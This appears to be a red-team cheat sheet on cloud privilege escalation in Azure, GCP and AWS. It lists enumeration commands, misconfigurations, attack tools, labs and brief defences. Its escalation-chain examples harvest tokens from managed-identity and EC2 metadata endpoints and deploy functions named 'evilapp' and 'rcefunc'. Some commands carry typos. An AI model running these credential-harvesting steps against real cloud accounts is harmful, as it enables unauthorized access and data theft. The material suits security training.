The pivot to cloud infrastructure has fundamentally reshaped the adversarial landscape. Enterprises leveraging Azure and Google Cloud Platform (GCP) often underestimate the complexity of securing distributed identities, role-based access controls (RBAC), and resource provisioning models. This introduces a misconfiguration that red teams can weaponize to escalate privileges, exfiltrate sensitive data, or achieve persistent access.

Azure:

Credentialed Access (via Az CLI):

az login # Auth with user or service principal.
az acount list # Enumerate subscriptions.
az ad user list # Dump AD users.
az role assignment list # Identify excessive privileges.
az ad sp list --show-mine # Shows accessible service principals
az storage account list # Discover blob containers and their access levels

MicroBurst (PowerShell)

Invoke-EnumerateAzureBlobs -Verbose
Invoke-EnumerateAzureSubDomains -Verbose
Get-AzurePasswords -Verbose

Google Cloud Platform (GCP):

Enumeration with gcloud CLI:

gcloud auth login
gcloud projects list
gcloud iam roles list --project=<project-id>
gcloud iam service-accounts list
gcloud projects get-iam-policy <project-id>

CloudFox Sample Command:

cloudfox gcp -p <project-id> --all

AWS (Amazon Web Services)

Credentialed Enumeration via AWS CLI:

aws sts get-caller-identity
aws iam list-users
aws iam list-roles
aws iam list-policies -scope Local
aws s3 ls

Tools: enumerate-iam, Pacu, CloudSploit, ScoutSuite, awscli

Misconfigurations typically arise due to over-permissive IAM policies, improper exposure of public resources, and ignorance of internal privilege boundaries.

Azure Misconfigurations

Misconfigurations, Attack Vector & Impact:

• Contributor Role on Subscription: Allows resource creation including Function Apps and Key Vault abuse.
• Public Storage Containers: Permits unauthenticated access, data leakage, or malware hosting.
• Exposed Service Principal Credentials: Hardcoded or leaked secrets reused to impersonate privileged services.
• App Registration Token Disclosure: Tokens exposed in logs or repository; escalated Graph API access or identity impersonation.

Tools: MicroBurst, StormSpotter, ADDInternals, Az CLI

GCP Misconfigurations

Misconfigurations, Attack Vector & Impact:

• Public GCS Buckets: Threat actors can list, download, or overwrite sensitive content.
• Metadata API Exposure on Compute Instances: Credential harvesting via <IP>; enables lateral movement.
• Editor/Owner IAM Roles: Complete project takeover; excessive default access. yei
• Function Deployment Rights: Allows attackers to deploy backdoored Cloud Functions with persistence.

Tools: gcloud, CloudFox, GCPBuckeBrute, Pacu

AWS Misconfigurations

Misconfigurations, Attack Vector & Impact:

• IAM Policy Wildcards (e.g., “Action”:”*”): Grants unrestricted access to services, enabling privilege escalation
• Public S3 Buckets: Leads to data leakage or malware hosting in storage
• Over-Privileged Lambda Functions: Lambda with broad IAM can invoke other services or modify resources.
• EC2 Metadata Service Abuse: Unrestricted access to 169.254.169.254 yields AWS temporary credentials for privilege escalation
• Misconfigured AssumeRole Policies: Cross-account or unintended role escalation via AWS STS AssumeRole

Tools: enumerate-iam, CloudSploit, Pacu, ScoutSuite, AWSBucketDump

Azure Escalation Chain Example:

az functionapp create --name evilapp --resource-group rg1 --storage-account mystorage
curl -H Metadata:true "http://localhost:8080/msi/token?resource=https://graph.microsoft.com"
curl -X GET -H "Authorization: Bearer <access_token>" https://graph.microsoft.com/v1.0/users

GCP Escalation Chain Example:

gcloud auth activate-service-account --key-file=creds.json
gcloud iam service-accounts impersonate --target-service-account [email protected]
gcloud functions deploy rcefunc --runtime python39 --trigger-http --entry-point=main

AWS Escalation Chain Example:

# Access metadata from EC2 instance
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Use harvested creds to escalate via STS
aws sts get-caller-identity
aws iam list-attached-user-policies --user-name <extracted-user>

Azure Labs

• HTB → Ready
• CloudGoat Azure
• Azurite + Local MSI Emulation

GCP Labs

• Flaws.cloud (GCP)
• CloudGoat GCP Fork
• Pacu Lab Scripts

AWS Labs

• CloudGoat AWS
• Flaws2.cloud
• Pacu + LocalStack
• Terraform AWS IAM Playground

Cloud Platform and Defensive Measures

• Azure: Monitor Function App logs; enforce RBAC and minimal app scopes.
• GCP: Audit IAM bindings; block metadata access from exposed services.
• AWS: Restrict IAM wildcards; monitor STS use and EC2 metadata logs.

Tools: ScoutSuite, Prowler, Security Hub, CloudSploit, AWS Config

Cloud security is a lattice of privilege inheritance, implicit trust, and user error. Red teams must embrace cloud-native tactics that move laterally across identity providers, abuse role assumptions, and persist in serverless environments.

In 2025, the most dangerous cloud exploit isn’t a vulnerability, it’s a misconfigured role you forgot existed.